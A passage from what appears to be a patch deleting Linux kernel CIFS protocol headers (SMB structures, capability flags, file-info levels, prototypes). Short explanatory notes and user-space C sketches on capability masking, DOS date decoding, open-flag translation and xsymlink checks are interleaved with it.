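		if (size < 18)	/* malformed entry; avoid an infinite loop */
			break;
		entry += size;
	}
}
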
+-
+-/*
+- ************************************************************************
+- * All structs for everything above the SMB PDUs themselves
+- * (such as the T2 level specific data) go here
+- ************************************************************************
+- */
+-
+-/*
+- * Information on a server
+- */
+-
+-struct serverInfo {
+-	char name[16];
+-	unsigned char versionMajor;
+-	unsigned char versionMinor;
+-	unsigned long type;
+-	unsigned int commentOffset;
+-} __attribute__((packed));
+-
+-/*
+- * The following structure is the format of the data returned on a NetShareEnum
+- * with level "90" (x5A)
+- */
+-
+-struct shareInfo {
+-	char shareName[13];
+-	char pad;
+-	unsigned short type;
+-	unsigned int commentOffset;
+-} __attribute__((packed));
+-
+-struct aliasInfo {
+-	char aliasName[9];
+-	char pad;
+-	unsigned int commentOffset;
+-	unsigned char type[2];
+-} __attribute__((packed));
+-
+-struct aliasInfo92 {
+-	int aliasNameOffset;
+-	int serverNameOffset;
+-	int shareNameOffset;
+-} __attribute__((packed));
+-
+-typedef struct {
+-	__le64 TotalAllocationUnits;
+-	__le64 FreeAllocationUnits;
+-	__le32 SectorsPerAllocationUnit;
+-	__le32 BytesPerSector;
+-} __attribute__((packed)) FILE_SYSTEM_INFO;	/* size info, level 0x103 */
+-
+-typedef struct {
+-	__le32 fsid;
+-	__le32 SectorsPerAllocationUnit;
+-	__le32 TotalAllocationUnits;
+-	__le32 FreeAllocationUnits;
+-	__le16  BytesPerSector;
+-} __attribute__((packed)) FILE_SYSTEM_ALLOC_INFO;
+-
+-typedef struct {
+-	__le16 MajorVersionNumber;
+-	__le16 MinorVersionNumber;
+-	__le64 Capability;
+-} __attribute__((packed)) FILE_SYSTEM_UNIX_INFO; /* Unix extension level 0x200*/
+-
+-/* Version numbers for CIFS UNIX major and minor. */
+-#define CIFS_UNIX_MAJOR_VERSION 1
+-#define CIFS_UNIX_MINOR_VERSION 0
+-
+-/* Linux/Unix extensions capability flags */
+-#define CIFS_UNIX_FCNTL_CAP             0x00000001 /* support for fcntl locks */
+-#define CIFS_UNIX_POSIX_ACL_CAP         0x00000002 /* support getfacl/setfacl */
+-#define CIFS_UNIX_XATTR_CAP             0x00000004 /* support new namespace   */
+-#define CIFS_UNIX_EXTATTR_CAP           0x00000008 /* support chattr/chflag   */
+-#define CIFS_UNIX_POSIX_PATHNAMES_CAP   0x00000010 /* Allow POSIX path chars  */
+-#define CIFS_UNIX_POSIX_PATH_OPS_CAP    0x00000020 /* Allow new POSIX path based
+-						      calls including posix open
+-						      and posix unlink */
+-#define CIFS_UNIX_LARGE_READ_CAP        0x00000040 /* support reads >128K (up
+-						      to 0xFFFF00) */
+-#define CIFS_UNIX_LARGE_WRITE_CAP       0x00000080
+-#define CIFS_UNIX_TRANSPORT_ENCRYPTION_CAP 0x00000100 /* can do SPNEGO crypt */
+-#define CIFS_UNIX_TRANSPORT_ENCRYPTION_MANDATORY_CAP  0x00000200 /* must do  */
+-#define CIFS_UNIX_PROXY_CAP             0x00000400 /* Proxy cap: 0xACE ioctl and
+-						      QFS PROXY call */
+-#ifdef CONFIG_CIFS_POSIX
+-/* presumably don't need the 0x20 POSIX_PATH_OPS_CAP since we never send
+-   LockingX instead of a posix locking call on a unix session (and we do
+-   not expect LockingX to use different (ie Windows) semantics than posix
+-   locking on the same session). If WINE needs to do this later, we can
+-   add this cap back in later. */
+-/* #define CIFS_UNIX_CAP_MASK              0x000000fb */
+-#define CIFS_UNIX_CAP_MASK              0x000003db
+-#else
+-#define CIFS_UNIX_CAP_MASK              0x00000013
+-#endif /* CONFIG_CIFS_POSIX */
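
A client is expected to AND the capability word the server advertises (in FILE_SYSTEM_UNIX_INFO above) against CIFS_UNIX_CAP_MASK and enable only the features whose bits survive; reset_cifs_unix_caps(), declared in cifsproto.h below, performs that negotiation in the kernel. A minimal user-space sketch of the masking, illustrative only, with the CONFIG_CIFS_POSIX mask value inlined:

#include <stdint.h>
#include <stdio.h>

#define CIFS_UNIX_FCNTL_CAP     0x00000001
#define CIFS_UNIX_POSIX_ACL_CAP 0x00000002
#define CIFS_UNIX_CAP_MASK      0x000003db	/* CONFIG_CIFS_POSIX value */

int main(void)
{
	uint64_t server_caps = 0x000000ff;	/* sample advertised word */
	uint64_t agreed = server_caps & CIFS_UNIX_CAP_MASK;

	printf("fcntl locks: %s\n",
	       (agreed & CIFS_UNIX_FCNTL_CAP) ? "on" : "off");
	printf("POSIX ACLs:  %s\n",
	       (agreed & CIFS_UNIX_POSIX_ACL_CAP) ? "on" : "off");
	return 0;
}
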
+-
+-
+-#define CIFS_POSIX_EXTENSIONS           0x00000010 /* support for new QFSInfo */
+-
+-typedef struct {
+-	/* For undefined recommended transfer size return -1 in that field */
+-	__le32 OptimalTransferSize;  /* bsize on some os, iosize on other os */
+-	__le32 BlockSize;
+-    /* The next three fields are in terms of the block size
+-	above. If the block size is unknown, 4096 would be a
+-	reasonable block size for a server to report.
+-	Note that returning blocks/blocksavail removes the need
+-	to make a second call (to QFSInfo level 0x103) to get this info.
+-	UserBlockAvail is typically less than or equal to BlocksAvail;
+-	if no distinction is made, return the same value in each. */
+-	__le64 TotalBlocks;
+-	__le64 BlocksAvail;       /* bfree */
+-	__le64 UserBlocksAvail;   /* bavail */
+-    /* For undefined Node fields or FSID return -1 */
+-	__le64 TotalFileNodes;
+-	__le64 FreeFileNodes;
+-	__le64 FileSysIdentifier;   /* fsid */
+-	/* NB Namelen comes from FILE_SYSTEM_ATTRIBUTE_INFO call */
+-	/* NB flags can come from FILE_SYSTEM_DEVICE_INFO call   */
+-} __attribute__((packed)) FILE_SYSTEM_POSIX_INFO;
+-
+-/* DeviceType Flags */
+-#define FILE_DEVICE_CD_ROM              0x00000002
+-#define FILE_DEVICE_CD_ROM_FILE_SYSTEM  0x00000003
+-#define FILE_DEVICE_DFS                 0x00000006
+-#define FILE_DEVICE_DISK                0x00000007
+-#define FILE_DEVICE_DISK_FILE_SYSTEM    0x00000008
+-#define FILE_DEVICE_FILE_SYSTEM         0x00000009
+-#define FILE_DEVICE_NAMED_PIPE          0x00000011
+-#define FILE_DEVICE_NETWORK             0x00000012
+-#define FILE_DEVICE_NETWORK_FILE_SYSTEM 0x00000014
+-#define FILE_DEVICE_NULL                0x00000015
+-#define FILE_DEVICE_PARALLEL_PORT       0x00000016
+-#define FILE_DEVICE_PRINTER             0x00000018
+-#define FILE_DEVICE_SERIAL_PORT         0x0000001b
+-#define FILE_DEVICE_STREAMS             0x0000001e
+-#define FILE_DEVICE_TAPE                0x0000001f
+-#define FILE_DEVICE_TAPE_FILE_SYSTEM    0x00000020
+-#define FILE_DEVICE_VIRTUAL_DISK        0x00000024
+-#define FILE_DEVICE_NETWORK_REDIRECTOR  0x00000028
+-
+-/* Device Characteristics */
+-#define FILE_REMOVABLE_MEDIA			0x00000001
+-#define FILE_READ_ONLY_DEVICE			0x00000002
+-#define FILE_FLOPPY_DISKETTE			0x00000004
+-#define FILE_WRITE_ONCE_MEDIA			0x00000008
+-#define FILE_REMOTE_DEVICE			0x00000010
+-#define FILE_DEVICE_IS_MOUNTED			0x00000020
+-#define FILE_VIRTUAL_VOLUME			0x00000040
+-#define FILE_DEVICE_SECURE_OPEN			0x00000100
+-#define FILE_CHARACTERISTIC_TS_DEVICE		0x00001000
+-#define FILE_CHARACTERISTIC_WEBDAV_DEVICE	0x00002000
+-#define FILE_PORTABLE_DEVICE			0x00004000
+-#define FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL 0x00020000
+-
+-typedef struct {
+-	__le32 DeviceType;
+-	__le32 DeviceCharacteristics;
+-} __attribute__((packed)) FILE_SYSTEM_DEVICE_INFO; /* device info level 0x104 */
+-
+-/* minimum includes first three fields, and empty FS Name */
+-#define MIN_FS_ATTR_INFO_SIZE 12
+-
+-
+-/* List of FileSystemAttributes - see 2.5.1 of MS-FSCC */
+-#define FILE_SUPPORTS_SPARSE_VDL	0x10000000 /* faster nonsparse extend */
+-#define FILE_SUPPORTS_BLOCK_REFCOUNTING	0x08000000 /* allow ioctl dup extents */
+-#define FILE_SUPPORT_INTEGRITY_STREAMS	0x04000000
+-#define FILE_SUPPORTS_USN_JOURNAL	0x02000000
+-#define FILE_SUPPORTS_OPEN_BY_FILE_ID	0x01000000
+-#define FILE_SUPPORTS_EXTENDED_ATTRIBUTES 0x00800000
+-#define FILE_SUPPORTS_HARD_LINKS	0x00400000
+-#define FILE_SUPPORTS_TRANSACTIONS	0x00200000
+-#define FILE_SEQUENTIAL_WRITE_ONCE	0x00100000
+-#define FILE_READ_ONLY_VOLUME		0x00080000
+-#define FILE_NAMED_STREAMS		0x00040000
+-#define FILE_SUPPORTS_ENCRYPTION	0x00020000
+-#define FILE_SUPPORTS_OBJECT_IDS	0x00010000
+-#define FILE_VOLUME_IS_COMPRESSED	0x00008000
+-#define FILE_SUPPORTS_REMOTE_STORAGE	0x00000100
+-#define FILE_SUPPORTS_REPARSE_POINTS	0x00000080
+-#define FILE_SUPPORTS_SPARSE_FILES	0x00000040
+-#define FILE_VOLUME_QUOTAS		0x00000020
+-#define FILE_FILE_COMPRESSION		0x00000010
+-#define FILE_PERSISTENT_ACLS		0x00000008
+-#define FILE_UNICODE_ON_DISK		0x00000004
+-#define FILE_CASE_PRESERVED_NAMES	0x00000002
+-#define FILE_CASE_SENSITIVE_SEARCH	0x00000001
+-typedef struct {
+-	__le32 Attributes;
+-	__le32 MaxPathNameComponentLength;
+-	__le32 FileSystemNameLen;
+-	char FileSystemName[52]; /* do not have to save this - get subset? */
+-} __attribute__((packed)) FILE_SYSTEM_ATTRIBUTE_INFO;
+-
+-/******************************************************************************/
+-/* QueryFileInfo/QueryPathinfo (also for SetPath/SetFile) data buffer formats */
+-/******************************************************************************/
+-typedef struct { /* data block encoding of response to level 263 QPathInfo */
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le32 Attributes;
+-	__u32 Pad1;
+-	__le64 AllocationSize;
+-	__le64 EndOfFile;	/* size ie offset to first free byte in file */
+-	__le32 NumberOfLinks;	/* hard links */
+-	__u8 DeletePending;
+-	__u8 Directory;
+-	__u16 Pad2;
+-	__le64 IndexNumber;
+-	__le32 EASize;
+-	__le32 AccessFlags;
+-	__u64 IndexNumber1;
+-	__le64 CurrentByteOffset;
+-	__le32 Mode;
+-	__le32 AlignmentRequirement;
+-	__le32 FileNameLength;
+-	char FileName[1];
+-} __attribute__((packed)) FILE_ALL_INFO;	/* level 0x107 QPathInfo */
+-
+-typedef struct {
+-	__le64 AllocationSize;
+-	__le64 EndOfFile;	/* size ie offset to first free byte in file */
+-	__le32 NumberOfLinks;	/* hard links */
+-	__u8 DeletePending;
+-	__u8 Directory;
+-	__u16 Pad;
+-} __attribute__((packed)) FILE_STANDARD_INFO;	/* level 0x102 QPathInfo */
+-
+-
+-/* defines for enumerating possible values of the Unix type field below */
+-#define UNIX_FILE      0
+-#define UNIX_DIR       1
+-#define UNIX_SYMLINK   2
+-#define UNIX_CHARDEV   3
+-#define UNIX_BLOCKDEV  4
+-#define UNIX_FIFO      5
+-#define UNIX_SOCKET    6
+-typedef struct {
+-	__le64 EndOfFile;
+-	__le64 NumOfBytes;
+-	__le64 LastStatusChange; /*SNIA specs DCE time for the 3 time fields */
+-	__le64 LastAccessTime;
+-	__le64 LastModificationTime;
+-	__le64 Uid;
+-	__le64 Gid;
+-	__le32 Type;
+-	__le64 DevMajor;
+-	__le64 DevMinor;
+-	__le64 UniqueId;
+-	__le64 Permissions;
+-	__le64 Nlinks;
+-} __attribute__((packed)) FILE_UNIX_BASIC_INFO;	/* level 0x200 QPathInfo */
+-
+-typedef struct {
+-	char LinkDest[1];
+-} __attribute__((packed)) FILE_UNIX_LINK_INFO;	/* level 0x201 QPathInfo */
+-
+-/* The following three structures are needed only for
+-	setting time to NT4 and some older servers via
+-	the primitive DOS time format */
+-typedef struct {
+-	__u16 Day:5;
+-	__u16 Month:4;
+-	__u16 Year:7;
+-} __attribute__((packed)) SMB_DATE;
+-
+-typedef struct {
+-	__u16 TwoSeconds:5;
+-	__u16 Minutes:6;
+-	__u16 Hours:5;
+-} __attribute__((packed)) SMB_TIME;
+-
+-typedef struct {
+-	__le16 CreationDate; /* SMB Date see above */
+-	__le16 CreationTime; /* SMB Time */
+-	__le16 LastAccessDate;
+-	__le16 LastAccessTime;
+-	__le16 LastWriteDate;
+-	__le16 LastWriteTime;
+-	__le32 DataSize; /* File Size (EOF) */
+-	__le32 AllocationSize;
+-	__le16 Attributes; /* verify not u32 */
+-	__le32 EASize;
+-} __attribute__((packed)) FILE_INFO_STANDARD;  /* level 1 SetPath/FileInfo */
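
SMB_DATE and SMB_TIME above pack the legacy DOS format: days in bits 0-4, months in bits 5-8, years in bits 9-15 offset from 1980, and seconds stored at two-second granularity. Because C bitfield layout is implementation-defined, a portable decoder works on the raw 16-bit words instead; a stand-alone sketch (helper name hypothetical, field widths taken from the bitfields above):

#include <stdio.h>

static void decode_dos_datetime(unsigned short dos_date, unsigned short dos_time)
{
	unsigned day   =   dos_date        & 0x1f;		/* Day:5   */
	unsigned month =  (dos_date >> 5)  & 0x0f;		/* Month:4 */
	unsigned year  = ((dos_date >> 9)  & 0x7f) + 1980;	/* Year:7, DOS epoch */
	unsigned sec   =  (dos_time        & 0x1f) * 2;		/* TwoSeconds:5 */
	unsigned min   =  (dos_time >> 5)  & 0x3f;		/* Minutes:6 */
	unsigned hour  =  (dos_time >> 11) & 0x1f;		/* Hours:5 */

	printf("%04u-%02u-%02u %02u:%02u:%02u\n",
	       year, month, day, hour, min, sec);
}
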
+-
+-typedef struct {
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le32 Attributes;
+-	__u32 Pad;
+-} __attribute__((packed)) FILE_BASIC_INFO;	/* size info, level 0x101 */
+-
+-struct file_allocation_info {
+-	__le64 AllocationSize; /* Note old Samba srvr rounds this up too much */
+-} __attribute__((packed));	/* size used on disk, for level 0x103 for set,
+-				   0x105 for query */
+-
+-struct file_end_of_file_info {
+-	__le64 FileSize;		/* offset to end of file */
+-} __attribute__((packed)); /* size info, level 0x104 for set, 0x106 for query */
+-
+-struct file_alt_name_info {
+-	__u8   alt_name[1];
+-} __attribute__((packed));      /* level 0x0108 */
+-
+-struct file_stream_info {
+-	__le32 number_of_streams;  /* BB check sizes and verify location */
+-	/* followed by info on streams themselves
+-		u64 size;
+-		u64 allocation_size
+-		stream info */
+-};      /* level 0x109 */
+-
+-struct file_compression_info {
+-	__le64 compressed_size;
+-	__le16 format;
+-	__u8   unit_shift;
+-	__u8   ch_shift;
+-	__u8   cl_shift;
+-	__u8   pad[3];
+-} __attribute__((packed));      /* level 0x10b */
+-
+-/* POSIX ACL set/query path info structures */
+-#define CIFS_ACL_VERSION 1
+-struct cifs_posix_ace { /* access control entry (ACE) */
+-	__u8  cifs_e_tag;
+-	__u8  cifs_e_perm;
+-	__le64 cifs_uid; /* or gid */
+-} __attribute__((packed));
+-
+-struct cifs_posix_acl { /* access control list (ACL) */
+-	__le16	version;
+-	__le16	access_entry_count;  /* access ACL - count of entries */
+-	__le16	default_entry_count; /* default ACL - count of entries */
+-	struct cifs_posix_ace ace_array[];
+-	/* followed by
+-	struct cifs_posix_ace default_ace_array[] */
+-} __attribute__((packed));  /* level 0x204 */
+-
+-/* types of access control entries already defined in posix_acl.h */
+-/* #define CIFS_POSIX_ACL_USER_OBJ	 0x01
+-#define CIFS_POSIX_ACL_USER      0x02
+-#define CIFS_POSIX_ACL_GROUP_OBJ 0x04
+-#define CIFS_POSIX_ACL_GROUP     0x08
+-#define CIFS_POSIX_ACL_MASK      0x10
+-#define CIFS_POSIX_ACL_OTHER     0x20 */
+-
+-/* types of perms */
+-/* #define CIFS_POSIX_ACL_EXECUTE   0x01
+-#define CIFS_POSIX_ACL_WRITE     0x02
+-#define CIFS_POSIX_ACL_READ	     0x04 */
+-
+-/* end of POSIX ACL definitions */
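
On the wire, the level 0x204 blob is the 6-byte cifs_posix_acl header followed by the access ACEs and then the default ACEs, each ACE being 10 bytes (tag byte, perm byte, 64-bit id). A small stand-alone sketch of the resulting size computation, with the sizes hard-coded from the packed layouts above:

#include <stddef.h>

/* cifs_posix_acl header = 3 * __le16 = 6 bytes,
 * cifs_posix_ace        = 1 + 1 + 8  = 10 bytes */
static size_t cifs_posix_acl_blob_size(unsigned int access_aces,
				       unsigned int default_aces)
{
	return 6 + 10u * ((size_t)access_aces + default_aces);
}
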
+-
+-/* POSIX Open Flags */
+-#define SMB_O_RDONLY 	 0x1
+-#define SMB_O_WRONLY 	0x2
+-#define SMB_O_RDWR 	0x4
+-#define SMB_O_CREAT 	0x10
+-#define SMB_O_EXCL 	0x20
+-#define SMB_O_TRUNC 	0x40
+-#define SMB_O_APPEND 	0x80
+-#define SMB_O_SYNC 	0x100
+-#define SMB_O_DIRECTORY 0x200
+-#define SMB_O_NOFOLLOW 	0x400
+-#define SMB_O_DIRECT 	0x800
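
The SMB_O_* bits above do not coincide numerically with the Linux O_* constants (O_CREAT is 0x40 on most ports, for example), so a client has to translate open(2) flags explicitly. A hedged stand-alone sketch of that translation, covering only the common bits (helper name hypothetical):

#include <fcntl.h>

#define SMB_O_RDONLY 0x1
#define SMB_O_WRONLY 0x2
#define SMB_O_RDWR   0x4
#define SMB_O_CREAT  0x10
#define SMB_O_EXCL   0x20
#define SMB_O_TRUNC  0x40
#define SMB_O_APPEND 0x80

static unsigned int posix_flags_to_smb(int f_flags)
{
	unsigned int smb = 0;

	switch (f_flags & O_ACCMODE) {	/* the access mode is a 2-bit field */
	case O_RDONLY: smb |= SMB_O_RDONLY; break;
	case O_WRONLY: smb |= SMB_O_WRONLY; break;
	case O_RDWR:   smb |= SMB_O_RDWR;   break;
	}
	if (f_flags & O_CREAT)  smb |= SMB_O_CREAT;
	if (f_flags & O_EXCL)   smb |= SMB_O_EXCL;
	if (f_flags & O_TRUNC)  smb |= SMB_O_TRUNC;
	if (f_flags & O_APPEND) smb |= SMB_O_APPEND;
	return smb;
}
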
+-
+-typedef struct {
+-	__le32 OpenFlags; /* same as NT CreateX */
+-	__le32 PosixOpenFlags;
+-	__le64 Permissions;
+-	__le16 Level; /* reply level requested (see QPathInfo levels) */
+-} __attribute__((packed)) OPEN_PSX_REQ; /* level 0x209 SetPathInfo data */
+-
+-typedef struct {
+-	__le16 OplockFlags;
+-	__u16 Fid;
+-	__le32 CreateAction;
+-	__le16 ReturnedLevel;
+-	__le16 Pad;
+-	/* struct following varies based on requested level */
+-} __attribute__((packed)) OPEN_PSX_RSP; /* level 0x209 SetPathInfo data */
+-
+-#define SMB_POSIX_UNLINK_FILE_TARGET		0
+-#define SMB_POSIX_UNLINK_DIRECTORY_TARGET	1
+-
+-struct unlink_psx_rq { /* level 0x20a SetPathInfo */
+-	__le16 type;
+-} __attribute__((packed));
+-
+-struct file_internal_info {
+-	__le64  UniqueId; /* inode number */
+-} __attribute__((packed));      /* level 0x3ee */
+-
+-struct file_mode_info {
+-	__le32	Mode;
+-} __attribute__((packed));      /* level 0x3f8 */
+-
+-struct file_attrib_tag {
+-	__le32 Attribute;
+-	__le32 ReparseTag;
+-} __attribute__((packed));      /* level 0x40b */
+-
+-
+-/********************************************************/
+-/*  FindFirst/FindNext transact2 data buffer formats    */
+-/********************************************************/
+-
+-typedef struct {
+-	__le32 NextEntryOffset;
+-	__u32 ResumeKey; /* as with FileIndex - no need to convert */
+-	FILE_UNIX_BASIC_INFO basic;
+-	char FileName[1];
+-} __attribute__((packed)) FILE_UNIX_INFO; /* level 0x202 */
+-
+-typedef struct {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 ExtFileAttributes;
+-	__le32 FileNameLength;
+-	char FileName[1];
+-} __attribute__((packed)) FILE_DIRECTORY_INFO;   /* level 0x101 FF resp data */
+-
+-typedef struct {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 ExtFileAttributes;
+-	__le32 FileNameLength;
+-	__le32 EaSize; /* length of the xattrs */
+-	char FileName[1];
+-} __attribute__((packed)) FILE_FULL_DIRECTORY_INFO; /* level 0x102 rsp data */
+-
+-typedef struct {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 ExtFileAttributes;
+-	__le32 FileNameLength;
+-	__le32 EaSize; /* EA size */
+-	__le32 Reserved;
+-	__le64 UniqueId; /* inode num - le since Samba puts ino in low 32 bit*/
+-	char FileName[1];
+-} __attribute__((packed)) SEARCH_ID_FULL_DIR_INFO; /* level 0x105 FF rsp data */
+-
+-typedef struct {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 ExtFileAttributes;
+-	__le32 FileNameLength;
+-	__le32 EaSize; /* length of the xattrs */
+-	__u8   ShortNameLength;
+-	__u8   Reserved;
+-	__u8   ShortName[24];
+-	char FileName[1];
+-} __attribute__((packed)) FILE_BOTH_DIRECTORY_INFO; /* level 0x104 FFrsp data */
+-
+-typedef struct {
+-	__u32  ResumeKey;
+-	__le16 CreationDate; /* SMB Date */
+-	__le16 CreationTime; /* SMB Time */
+-	__le16 LastAccessDate;
+-	__le16 LastAccessTime;
+-	__le16 LastWriteDate;
+-	__le16 LastWriteTime;
+-	__le32 DataSize; /* File Size (EOF) */
+-	__le32 AllocationSize;
+-	__le16 Attributes; /* verify not u32 */
+-	__u8   FileNameLength;
+-	char FileName[1];
+-} __attribute__((packed)) FIND_FILE_STANDARD_INFO; /* level 0x1 FF resp data */
+-
+-
+-struct win_dev {
+-	unsigned char type[8]; /* IntxCHR or IntxBLK */
+-	__le64 major;
+-	__le64 minor;
+-} __attribute__((packed));
+-
+-struct gea {
+-	unsigned char name_len;
+-	char name[1];
+-} __attribute__((packed));
+-
+-struct gealist {
+-	unsigned long list_len;
+-	struct gea list[1];
+-} __attribute__((packed));
+-
+-struct fea {
+-	unsigned char EA_flags;
+-	__u8 name_len;
+-	__le16 value_len;
+-	char name[1];
+-	/* optionally followed by value */
+-} __attribute__((packed));
+-/* flags for _FEA.fEA */
+-#define FEA_NEEDEA         0x80	/* need EA bit */
+-
+-struct fealist {
+-	__le32 list_len;
+-	struct fea list[1];
+-} __attribute__((packed));
+-
+-/* used to hold an arbitrary blob of data */
+-struct data_blob {
+-	__u8 *data;
+-	size_t length;
+-	void (*free) (struct data_blob *data_blob);
+-} __attribute__((packed));
+-
+-
+-#ifdef CONFIG_CIFS_POSIX
+-/*
+-	For better POSIX semantics from the Linux client (even better
+-	than the existing CIFS Unix Extensions), we need updated PDUs for:
+-
+-	1) PosixCreateX - to set and return the mode, inode#, device info and
+-	perhaps add a CreateDevice - to create Pipes and other special .inodes
+-	Also note POSIX open flags
+-	2) Close - to return the last write time to do cache across close
+-		more safely
+-	3) FindFirst return unique inode number - what about resume key, two
+-	forms short (matches readdir) and full (enough info to cache inodes)
+-	4) Mkdir - set mode
+-
+-	And under consideration:
+-	5) FindClose2 (return nanosecond timestamp ??)
+-	6) Use nanosecond timestamps throughout all time fields if
+-	   corresponding attribute flag is set
+-	7) sendfile - handle based copy
+-
+-	what about fixing 64 bit alignment
+-
+-	There are also various legacy SMB/CIFS requests used as is
+-
+-	From existing Lanman and NTLM dialects:
+-	--------------------------------------
+-	NEGOTIATE
+-	SESSION_SETUP_ANDX (BB which?)
+-	TREE_CONNECT_ANDX (BB which wct?)
+-	TREE_DISCONNECT (BB add volume timestamp on response)
+-	LOGOFF_ANDX
+-	DELETE (note delete open file behavior)
+-	DELETE_DIRECTORY
+-	READ_AND_X
+-	WRITE_AND_X
+-	LOCKING_AND_X (note posix lock semantics)
+-	RENAME (note rename across dirs and open file rename posix behaviors)
+-	NT_RENAME (for hardlinks) Is this good enough for all features?
+-	FIND_CLOSE2
+-	TRANSACTION2 (18 cases)
+-		SMB_SET_FILE_END_OF_FILE_INFO2 SMB_SET_PATH_END_OF_FILE_INFO2
+-		(BB verify that never need to set allocation size)
+-		SMB_SET_FILE_BASIC_INFO2 (setting times - BB can it be done via
+-			 Unix ext?)
+-
+-	COPY (note support for copy across directories) - FUTURE, OPTIONAL
+-	setting/getting OS/2 EAs - FUTURE (BB can this handle
+-	setting Linux xattrs perfectly)         - OPTIONAL
+-	dnotify                                 - FUTURE, OPTIONAL
+-	quota                                   - FUTURE, OPTIONAL
+-
+-	Note that various requests implemented for NT interop such as
+-		NT_TRANSACT (IOCTL) QueryReparseInfo
+-	are unneeded to servers compliant with the CIFS POSIX extensions
+-
+-	From CIFS Unix Extensions:
+-	-------------------------
+-	T2 SET_PATH_INFO (SMB_SET_FILE_UNIX_LINK) for symlinks
+-	T2 SET_PATH_INFO (SMB_SET_FILE_BASIC_INFO2)
+-	T2 QUERY_PATH_INFO (SMB_QUERY_FILE_UNIX_LINK)
+-	T2 QUERY_PATH_INFO (SMB_QUERY_FILE_UNIX_BASIC)	BB check for missing
+-							inode fields
+-				Actually we need QUERY_FILE_UNIX_INFO
+-				since it has the inode num
+-				BB what about a) blksize/blkbits/blocks
+-							  b) i_version
+-							  c) i_rdev
+-							  d) notify mask?
+-							  e) generation
+-							  f) size_seqcount
+-	T2 FIND_FIRST/FIND_NEXT FIND_FILE_UNIX
+-	TRANS2_GET_DFS_REFERRAL		      - OPTIONAL but recommended
+-	T2_QFS_INFO QueryDevice/AttributeInfo - OPTIONAL
+- */
+-
+-/* xsymlink is a symlink format (used by MacOS) that can be used
+-   to save symlink info in a regular file when
+-   mounted to operating systems that do not
+-   support the cifs Unix extensions or EAs (for xattr
+-   based symlinks).  For such a file to be recognized
+-   as containing symlink data:
+-
+-   1) file size must be 1067,
+-   2) signature must begin file data,
+-   3) length field must be set to ASCII representation
+-	of a number which is less than or equal to 1024,
+-   4) md5 must match that of the path data */
+-
+-struct xsymlink {
+-	/* 1067 bytes */
+-	char signature[4]; /* XSym */ /* not null terminated */
+-	char cr0;         /* \n */
+-/* ASCII representation of length (4 bytes decimal) terminated by \n not null */
+-	char length[4];
+-	char cr1;         /* \n */
+-/* md5 of valid subset of path ie path[0] through path[length-1] */
+-	__u8 md5[32];
+-	char cr2;        /* \n */
+-/* if room left, then end with \n then 0x20s by convention but not required */
+-	char path[1024];
+-} __attribute__((packed));
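
A stand-alone sketch of checking rules 1-3 above against a raw file image (rule 4, the md5 comparison, is left as a comment; the offsets follow the packed layout of struct xsymlink, so the path data starts at byte 43):

#include <stdbool.h>
#include <stdlib.h>
#include <string.h>

static bool looks_like_xsymlink(const unsigned char *buf, size_t file_size)
{
	char lenbuf[5];
	long len;

	if (file_size != 1067)			/* rule 1: exact size */
		return false;
	if (memcmp(buf, "XSym\n", 5) != 0)	/* rule 2: signature first */
		return false;
	memcpy(lenbuf, buf + 5, 4);		/* rule 3: ASCII length <= 1024 */
	lenbuf[4] = '\0';
	len = strtol(lenbuf, NULL, 10);
	if (len <= 0 || len > 1024)
		return false;
	/* rule 4: md5 of buf[43 .. 43+len-1] must match the 32 hex
	 * characters at buf[10..41]; omitted here */
	return true;
}
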
+-
+-typedef struct file_xattr_info {
+-	/* BB do we need another field for flags? BB */
+-	__u32 xattr_name_len;
+-	__u32 xattr_value_len;
+-	char  xattr_name[];
+-	/* followed by xattr_value[xattr_value_len], no pad */
+-} __attribute__((packed)) FILE_XATTR_INFO; /* extended attribute info
+-					      level 0x205 */
+-
+-/* flags for lsattr and chflags commands were removed; they are in uapi/linux/fs.h */
+-
+-typedef struct file_chattr_info {
+-	__le64	mask; /* list of all possible attribute bits */
+-	__le64	mode; /* list of actual attribute bits on this inode */
+-} __attribute__((packed)) FILE_CHATTR_INFO;  /* ext attributes
+-						(chattr, chflags) level 0x206 */
+-#endif 				/* POSIX */
+-#endif				/* _CIFSPDU_H */
+diff --git a/fs/cifs/cifsproto.h b/fs/cifs/cifsproto.h
+deleted file mode 100644
+index 98513f5af3f96..0000000000000
+--- a/fs/cifs/cifsproto.h
++++ /dev/null
+@@ -1,696 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002,2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-#ifndef _CIFSPROTO_H
+-#define _CIFSPROTO_H
+-#include <linux/nls.h>
+-#include "trace.h"
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-#include "dfs_cache.h"
+-#endif
+-
+-struct statfs;
+-struct smb_rqst;
+-struct smb3_fs_context;
+-
+-/*
+- *****************************************************************
+- * All Prototypes
+- *****************************************************************
+- */
+-
+-extern struct smb_hdr *cifs_buf_get(void);
+-extern void cifs_buf_release(void *);
+-extern struct smb_hdr *cifs_small_buf_get(void);
+-extern void cifs_small_buf_release(void *);
+-extern void free_rsp_buf(int, void *);
+-extern int smb_send(struct TCP_Server_Info *, struct smb_hdr *,
+-			unsigned int /* length */);
+-extern unsigned int _get_xid(void);
+-extern void _free_xid(unsigned int);
+-#define get_xid()							\
+-({									\
+-	unsigned int __xid = _get_xid();				\
